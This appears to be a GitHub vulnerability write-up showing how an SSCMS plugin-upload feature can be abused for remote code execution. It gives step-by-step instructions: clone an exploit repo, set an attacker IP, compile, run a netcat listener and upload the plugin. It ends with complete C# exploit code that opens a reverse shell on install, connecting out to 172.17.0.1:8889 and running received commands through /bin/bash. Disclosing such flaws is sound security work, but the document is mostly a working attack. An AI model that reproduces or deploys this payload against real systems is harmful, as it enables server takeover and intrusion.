Skip to content

Latest commit

 

History

History
140 lines (113 loc) · 4.1 KB

Detail.md

File metadata and controls

140 lines (113 loc) · 4.1 KB

Vul Function Point

Plug-in offline installation function, Rebound Shell is realized by making malicious plug-ins.

图片

Plug-in Make

git clone https://github.com/Richard-Tang/SSCMS-PluginShell.git

Change the IP address in “Startup.cs” File, Compile using VisualStudio tools.

图片

图片

compression files

图片

GetShell

nc -lvvp 8889

图片

upload plugin

图片

Reverse Shell successfully obtains permissions

图片

Principle

You just need to write code that conforms to the plug-in format and invoke the corresponding function when the plug-in is installed to trigger Exploit Code。

using Microsoft.Extensions.DependencyInjection;
using SSCMS.Advertisement.Abstractions;
using SSCMS.Advertisement.Core;
using SSCMS.Plugins;
using System.Diagnostics;
using System;
using System.Text;
using System.Net.Sockets;
using System.Net;
using System.Threading;

namespace SSCMS.Advertisement
{
    public class Startup : IPluginConfigureServices
    {
        public void ConfigureServices(IServiceCollection services)
        {
            ... <--- ExploitCode
            
            services.AddScoped<IAdvertisementRepository, AdvertisementRepository>();
        }
	}
}

Exp

using Microsoft.Extensions.DependencyInjection;
using SSCMS.Advertisement.Abstractions;
using SSCMS.Advertisement.Core;
using SSCMS.Plugins;
using System.Diagnostics;
using System;
using System.Text;
using System.Net.Sockets;
using System.Net;
using System.Threading;

namespace SSCMS.Advertisement
{
    public class Startup : IPluginConfigureServices
    {
        
      public void ConfigureServices(IServiceCollection services)
      {
         ThreadStart childref = new ThreadStart(reversShell);
         Thread childThread = new Thread(childref);
         childThread.Start();
         services.AddScoped<IAdvertisementRepository, AdvertisementRepository>();
      }

		public void reversShell()
		{
			Socket socketshell = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
			IPAddress ip = IPAddress.Parse("172.17.0.1");
			IPEndPoint point = new IPEndPoint(ip, Convert.ToInt32("8889"));
			try
			{
				socketshell.Connect(point);
				while (true)
				{
					byte[] getdata = new byte[1024 * 5];
					int n = socketshell.Receive(getdata);
					string restr = Encoding.Default.GetString(getdata, 0, n);
					string command = restr;
					string resultok = willshell(command);
					byte[] senddata = new byte[1024 * 5];
					senddata = Encoding.Default.GetBytes(resultok);
					socketshell.Send(senddata);
				}
			}
			catch
			{
				socketshell.Close();
			}
		}

		public static string willshell(object command)
		{
			Process process = new Process();
			process.StartInfo.FileName = "/bin/bash";
			process.StartInfo.UseShellExecute = false;
			process.StartInfo.RedirectStandardError = true;
			process.StartInfo.RedirectStandardInput = true;
			process.StartInfo.RedirectStandardOutput = true;
			process.StartInfo.CreateNoWindow = true;
			process.Start();
			process.StandardInput.WriteLine("echo off");
			process.StandardInput.WriteLine(command);
			process.StandardInput.WriteLine("exit");
			string result = process.StandardOutput.ReadToEnd();
			return result;
		}
	}
}